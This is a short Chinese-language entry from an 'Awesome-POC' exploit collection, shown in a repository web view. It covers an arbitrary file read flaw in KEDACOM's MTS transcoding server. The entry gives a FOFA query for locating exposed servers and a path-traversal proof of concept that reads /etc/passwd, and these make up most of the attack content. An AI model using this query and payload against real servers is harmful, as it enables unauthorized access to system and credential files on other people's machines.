Awesome-POC/Web应用漏洞/科达 MTS转码服务器 任意文件读取漏洞.md
2024-11-06 14:10:36 +08:00

31 lines
456 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 科达 MTS转码服务器 任意文件读取漏洞
## 漏洞描述
KEDACOM MTS转码服务器存在任意文件读取漏洞攻击这通过漏洞可以读取服务器任意信息
## 漏洞影响
```
MTS转码服务器
```
## 网络测绘
```
app="MTS转码服务器"
```
## 漏洞复现
登录页面
![image-20220525145422524](images/202205251454625.png)
验证POC
```
/../../../../../../../../etc/passwd
```
![](images/202205251454380.png)